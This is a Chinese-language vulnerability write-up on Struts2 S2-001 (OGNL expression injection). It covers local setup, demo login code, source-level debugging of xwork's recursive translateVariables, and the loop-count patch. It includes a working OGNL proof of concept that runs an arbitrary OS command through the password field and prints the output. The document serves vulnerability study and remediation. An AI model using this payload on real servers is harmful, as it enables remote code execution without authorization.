S2-001本地复现与分析

环境搭建：win10   eclipes ee    struts2.0.1   tomcat8

导入最基础的jar包

web.xml

  S2-001 Example
  
    struts2
    org.apache.struts2.dispatcher.FilterDispatcher
  
  
    struts2
    /*
  
  
    index.jsp
  

LoginAction.java

package com.au.demo.action;

import com.opensymphony.xwork2.ActionSupport;

public class LoginAction extends ActionSupport {
    private String username = null;
    private String password = null;

    public String getUsername() {
        return this.username;
    }

    public String getPassword() {
        return this.password;
    }

    public void setUsername(String username) {
        this.username = username;
    }

    public void setPassword(String password) {
        this.password = password;
    }

    public String execute() throws Exception {
        if ((this.username.isEmpty()) || (this.password.isEmpty())) {
            return ERROR;
        }
        if ((this.username.equalsIgnoreCase("admin"))
                && (this.password.equals("password"))) {
            return SUCCESS;
        }
        return ERROR;
    }
}

index.jsp

<%@ page language="java" contentType="text/html; charset=UTF-8"
         pageEncoding="UTF-8"%>
<%@ taglib prefix="s" uri="/struts-tags" %>



  
  


S2-001 Demo

  
  
  

struts.xml

	 
	
        
            /welcome.jsp
            /index.jsp
        
    
	

导入对应的xwork.jar源码进行调试（找源码坑死我了）

有需要的这是本人搭建的环境下载地址：

https://pan.baidu.com/s/1_BBEIfoX-WSjLHQcqstVPA   提取码：aklq

测试点击提交：

构造的ognl被执行：

任意代码执行的POC：

%{
#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"pwd"})).redirectErrorStream(true).start(),
#b=#a.getInputStream(),
#c=new java.io.InputStreamReader(#b),
#d=new java.io.BufferedReader(#c),
#e=new char[50000],
#d.read(#e),
#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),
#f.getWriter().println(new java.lang.String(#e)),
#f.getWriter().flush(),
#f.getWriter().close()
}

将pwd替换为对应的命令，即可执行。

 

漏洞分析：

漏洞成因：

     可执行代码（ognl（可理解为代码））：

     在translateVariables方法中，递归解析表达式，在处理完%{password}后将password的值直接取出并继续在while循环中解析，若用户输入的password是恶意的ognl表达式，则得以解析执行。

     输入点：可构造恶意参数

     输出点：利用登录失败会重新返回页面并回带之前的输入内容

 

 

在xwork的jar包下com.opensymphony.xwork2.util.TextUtils 98行设置断点debug tomcat单步调试

关键代码：

 public static Object translateVariables(char open, String expression, ValueStack stack, Class asType, ParsedValueEvaluator evaluator) {
        // deal with the "pure" expressions first!
        //expression = expression.trim();
        Object result = expression;

        while (true) {
            int start = expression.indexOf(open + "{");
            int length = expression.length();
            int x = start + 2;
            int end;
            char c;
            int count = 1;
            while (start != -1 && x < length && count != 0) {
                c = expression.charAt(x++);
                if (c == '{') {
                    count++;
                } else if (c == '}') {
                    count--;
                }
            }
            end = x - 1;

            if ((start != -1) && (end != -1) && (count == 0)) {
                String var = expression.substring(start + 2, end);

                Object o = stack.findValue(var, asType);
                if (evaluator != null) {
                	o = evaluator.evaluate(o);
                }
                

                String left = expression.substring(0, start);
                String right = expression.substring(end + 1);
                if (o != null) {
                    if (TextUtils.stringSet(left)) {
                        result = left + o;
                    } else {
                        result = o;
                    }

                    if (TextUtils.stringSet(right)) {
                        result = result + right;
                    }

                    expression = left + o + right;
                } else {
                    // the variable doesn't exist, so don't display anything
                    result = left + right;
                    expression = left + right;
                }
            } else {
                break;
            }
        }

        return XWorkConverter.getInstance().convertValue(stack.getContext(), result, asType);
    }

 

通过对比username和password来进行分析：

顺序执行，expression值为username

 

多个return递归回到该方法，通过  stack.findValue() 得到username的输入值， 最后aaa 被赋值给 expression

 

注意这里和password进行比较~

继续单步调试再次进入该方法（递归解析ognl）：不符合while执行118行

此时不符合if条件     if ((start != -1) && (end != -1) && (count == 0)) 

进入多次return结束对username标签的执行回显到页面上

 

顺序执行，expression值为password

 

多个return递归回到该方法，通过  stack.findValue() 得到password的输入值，此时我们输入password的值 %{3+4}  被赋值给 expression

 

再次进入该方法，此时为ognl表示式，符合while条件和if判断，接下来就顺序解析了我们的  %{3+4}   expression赋值为7

进入多次return结束对password标签的执行回显到页面上

 

 

漏洞修复：

改变了ognl表达式的解析方法从而不会产生递归解析，用户的输入也不会再解析执行。

修补后的代码：增加判断

if (loopCount > maxLoopCount) {
    // translateVariables prevent infinite loop / expression recursive evaluation
    break;
}

当解析完一层表达式后，使其不符合上述判断，不再向下执行，执行break，跳出while（true）循环

源码（注释写的很清楚）：

public static Object translateVariables(char open, String expression, ValueStack stack, Class asType, ParsedValueEvaluator evaluator, int maxLoopCount) {
    // deal with the "pure" expressions first!
    //expression = expression.trim();
    Object result = expression;
    int loopCount = 1;
    int pos = 0;
    while (true) {
        
        int start = expression.indexOf(open + "{", pos);
        if (start == -1) {
            pos = 0;
            loopCount++;
            start = expression.indexOf(open + "{");
        }
        if (loopCount > maxLoopCount) {
            // translateVariables prevent infinite loop / expression recursive evaluation
            break;
        }
        int length = expression.length();
        int x = start + 2;
        int end;
        char c;
        int count = 1;
        while (start != -1 && x < length && count != 0) {
            c = expression.charAt(x++);
            if (c == '{') {
                count++;
            } else if (c == '}') {
                count--;
            }
        }
        end = x - 1;